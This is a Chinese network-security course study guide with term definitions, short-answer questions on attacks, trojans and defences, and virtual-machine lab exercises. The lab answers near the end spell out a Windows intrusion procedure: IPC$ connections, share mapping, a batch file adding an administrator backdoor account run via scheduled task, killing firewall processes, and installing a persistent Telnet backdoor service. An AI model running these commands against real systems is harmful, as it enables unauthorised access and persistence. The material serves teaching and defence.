（1）网络安全：所谓“网络安全”，是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭到破坏、更改、泄露，系统可以连续可靠正常地运行，网络服务不被中断。

（2）黑客：原指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。

但到了今天，黑客一词已被用于泛指那些专门利用电脑网络搞破坏或恶作剧的家伙。

对这些人的正确英文叫法是Cracker，有人翻译成“骇客”。

（3）扫描器：提供了扫描功能的软件工具。

（4）端口：端口一般指网络中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和I/O（基本输入输出）缓冲区。

端口是通过端口号来标记的，端口号只有整数，范围是从0 到65535。

端口可以看成是电脑与外界网络连接的一个门口。

（5）拒绝服务攻击：指终端或者完全拒绝对合法用户、网络、系统和其他资源的服务的攻击方法，其意图就是彻底破坏，这也是比较容易实现的攻击方法。

（6）病毒：计算机病毒是指编制或者在计算机程序中插入的破坏计算机功能或数据，影响计算机使用并且能够自我复制的一组指令或者程序代码。

（7）木马：木马是指潜伏在计算机中，受外部用户控制，以窃取计算机信息或者获取计算机控制权为目的的恶意程序。

（8）防火墙：防火墙是一项协助确保信息安全的设备，会依照特定的规则，允许或是限制传输的数据通过。

防火墙可以是一台专属的硬件也可以是架设在一般硬件上的一套软件。

（9）TCP/IP协议：传输控制协议/因特网互联协议，又名网络通讯协议，是Internet 最基本的协议、Internet国际互联网络的基础，由网络层的IP协议和传输层的TCP协议组成。

（10）IPC$：IPC是英文Internet Process Connection的缩写，即：命名管道，它是windows提供的一个通信基础，用来在两台计算机进程之间建立通信连接，而IPC后面的$是windows系统所使用的隐藏符号，因此IPC$表示IPC共享，但是是隐藏的共享。

默认IPC是共享的。

1、简答题：1）目前常见的网络攻击方式有哪几种类？答：（1）窃听：指攻击者通过非法手段对系统活动的监视从而获得一些安全关键信息。

（2）欺骗：指攻击者通过冒充正常用户以获取对攻击目标访问权或获取关键信息的攻击方法。

（3）拒绝服务：指终端或者完全拒绝对合法用户、网络、系统和其他资源的服务的攻击方法，其意图就是彻底破坏，这也是比较容易实现的攻击方法。

（4）数据驱动攻击：通过向某个程序发送数据，以产生非预期结果的攻击。

2）信息收集的方法分哪几种？答：（1）搜索引擎：搜索引擎是自动从因特网收集信息，经过一定整理以后，提供给用户进行查询的系统。

它包括信息搜集、信息整理和用户查询三部分。

（2）域名解析：域名到IP地址的转换过程。

（3）路由跟踪：路由跟踪就是从本地开始到达某一目标地址所经过的路由设备，并显示出这些路由设备的IP、连接时间等信息。

3）主机发现技术分哪几种？各有什么优缺点？答：（1）ping扫描：确定哪些机器是up的。

有2种方式：ICMP：类似于ping，发送icmp消息给目标，看是否有返回；TCP ping：给目标特定的tcp端口(如常用的80)发送ack消息，如果返回rst，说明机器up。

常用的tracetcp。

（2）ARP扫描：ARP（Address Resolution Protocol）即地址解析协议，它是用于局域网内的物理地址。

ARP扫描是指通过向目标主机发送ARP请求（查询目标主机的物理地址），如果目标主机回应一个ARP响应报文，则说明它是存活的。

（3）端口扫描：判断目标主机开启了哪些端口及其对应的服务；确定目标系统正在运行的TCP/UDP服务；在扫描时希望隐藏自己。

4）入侵者获取远程主机的管理员密码的主要手段有哪些？答：（1）猜测攻击（2）网络嗅探(sniffer) （3）字典攻击（4）键盘记录（5）穷举攻击（6）中间人攻击（7）混合攻击（8）社会工程学（9）直接破解系统口令文件5）简述防范Telnet入侵的方法。

答：（1）保证账号密码的强壮性，防止被暴力破解。

（2）禁用Telnet服务。

（3）关闭IPC$。

（4）安装网络防火墙。

6）Windows系统漏洞主要有哪几类？试各列举两种。

答：（1）本地提权类漏洞：入侵者用非管理员权限账号登录远程主机后，为了完全控制远程主机，需要提升权限所利用的漏洞。

例：Microsoft Windows内核消息处理本地缓冲区溢出漏洞；Microsoft OLE和COM远程缓冲区溢出漏洞。

（2）用户交互类漏洞：入侵者若想成功利用此类漏洞，必需远程主机的使用者打开并运行指定的漏洞利用文件。

例：Microsoft Windows图形渲染引擎安全漏洞。

（3）远程溢出类漏洞：存在此类漏洞，可使用特定的溢出工具对其进行溢出攻击，而不需要与远程主机的使用者进行交互，也不需要提前登录到远程系统上。

例：RPC接口远程任意代码可执行漏洞。

7）使用“计算机管理”可以实现哪些操作？有什么条件限制？答：可以实现的操作：（1）监视系统事件（2）创建和管理共享（3）启动和停止系统服务（4）查看连接到本地或远程计算机的用户列表（5）设置存储设备的属性（6）查看设备配置和添加新设备驱动程序（7）管理服务器应用程序和服务限制的条件：必须是Administrators组的成员才能完全使用。

8）计算机木马具有什么特点和功能？答：（1）特点：属于客户/服务模式。

客户端：主控端，向服务器发送连接请求。

服务端：被控端，提供服务，一般会打开一个默认端口进行监听，当侦听到客户端的连接请求，便自动运行相应程序。

（2）主要功能：文件操作、窃取信息（账号、密码等）、远程控制。

9）简述计算机木马的工作原理。

答：实际上是包含有服务器端和客户端的一套程序。

服务器端程序驻留在目标计算机里，随着系统启动而自行启动。

此外，使用传统技术的程序会在某端口进行监听，若接收到数据就对其进行识别，然后按照识别后的命令在目标计算机上执行一些操作（比如窃取口令，拷贝或删除文件，或重启计算机等）。

10）简述如何防御基于木马的入侵。

答：（1）显示文件扩展名（2）不打开任何可疑文件、文件夹和网页（3）升级IE （4）常开病毒防火墙（5）常开网络防火墙11）简述手功清除木马的基本步骤，以清除“灰鸽子”木马为例。

答：清除灰鸽子要在安全模式下操作，主要有两步：（1）清除灰鸽子的服务：清除灰鸽子的服务一定要在注册表里完成。

1、打开注册表编辑器（点击“开始”－》“运行”，输入“Regedit.exe”，确定。

），打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。

2、点击菜单“编辑”－》“查找”，“查找目标”输入“game.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为Game_Server，每个人这个服务项名称是不同的）。

3、删除整个Game_Server项。

（2）删除灰鸽子程序文件删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新启动计算机。

至此，灰鸽子已经被清除干净。

2、操作分析题：1）有一系统主机（虚拟机系统），完成系统入侵的操作：a)利用扫描工具，对目标主机进行端口和漏洞扫描、弱口令破解，指出系统存在哪些漏洞，可以用哪些方法进行入侵？（要求把扫描结果截屏）b)利用系统的弱口令漏洞，进行IPC$入侵，把目标机C盘映射为本地Z盘，并建立后门帐户（具有管理员权限）。

（要求把有关操作的过程加以说明，并把关键提示或结果进行截屏）c)说明目标主机应该如何防范本次入侵？PS：入侵方法和步骤：1）获取目标主机管理员账号和密码；（Xscan等）2）建立IPC$连接使用命令：net use \\IP\IPC$ “密码”/user: “账号”3）映射磁盘使用命令：net use z: \\IP\c$4）可以对远程主机进行文件操作了！5）留后门账号A、建立批处理文件hack.batNet user sysbak 123456 /addNet localgroup administrators sysbak /addB、拷贝文件到目标主机使用命令：copy file \\ip\pathC、查看目标主机时间使用命令：net time \\ipD、通过计划任务使远程主机执行hack.bat文件使用命令：at \\ip time hack.batE、验证账号是否建立成功先用net use * /del断开IPC$连接，再用后门账号进行重新连接。

防范：（1）关闭ipc$共享（2）禁止Lanmanserver服务（3）禁止NetLogon （4）禁止NBT（关闭139端口）（5）防火墙屏蔽139和445端口2）有一系统主机（虚拟机系统），完成系统入侵的操作：a)利用扫描工具，对目标主机进行端口和漏洞扫描、弱口令破解，指出系统存在哪些漏洞，可以用哪些方法进行入侵？（要求把扫描结果截屏）b)利用系统的弱口令漏洞，进行Telnet入侵，并建立后门帐户（具有管理员权限）。

（要求把有关操作的过程加以说明，并把关键提示或结果进行截屏）c)说明目标主机应该如何防范本次入侵？PS：使用Telnet登录方法：登录命令：Telnet HOST [PORT]断开：EXITTelnet典型入侵步骤建立IPC$连接→开启Telnet服务→去掉NTLM验证（一般都是输入１）→登录<NTLM认证方式>：0：不使用NTLM身份认证1：先尝试NTLM身份认证，如果失败再使用用户名密码2：只使用NTLM身份认证(xp里面)Telnet登录步骤：1、获取帐号和密码2、获取远程主机的IP地址（甚至端口）3、Telnet HOST [PORT]登录（默认是23端口）4、进行具体操作（详见《实战详解》P24~28）注：有关命令关机shotdown –s –f重启shotdown –r –f思路2：使用工具Opentelnet是国内高手编写的程序，包含两个工具，OpenTelnet.exe是用来启动远程服务器的Telnet的，Resumetelnet.exe是用来把修改了的配置都返回到默认配置上去，关闭Telnet服务。

（要先打开软件的目录：所在的盘符；dir;然后cd OpenTelnet）;格式：OpenTelnet.exe \\server(也就是ip) <帐号> <密码> <NTLM认证方式> <Telnet端口>;exit退出将解压opentelnet得文件放在c盘，运行cmd，进入c盘（c:）(要先打开软件的目录：所在的盘符；dir;然后cd OpenTelnet),输入OpenTelnet.exe \\目标ip 账户密码 1 端口号2、入侵过程1）X-Scan扫描弱口令主机2）用Opentelnet打开远程主机Telnet服务（或计算机管理）3）建立IPC$连接，把所需文件拷贝到远程主机（Instsrv.exe、shutdown.exe等）4）Telnet登录5）查看和杀死防火墙进程6）建立Telnet后门（利用Instsrv.exe建立新服务SYSHEALTH，指向Telnet 服务程序C:\WINNT\System32\tlntsvr.exe，这样，即使远程主机Telnet服务被禁用，都可以进行远程登录了。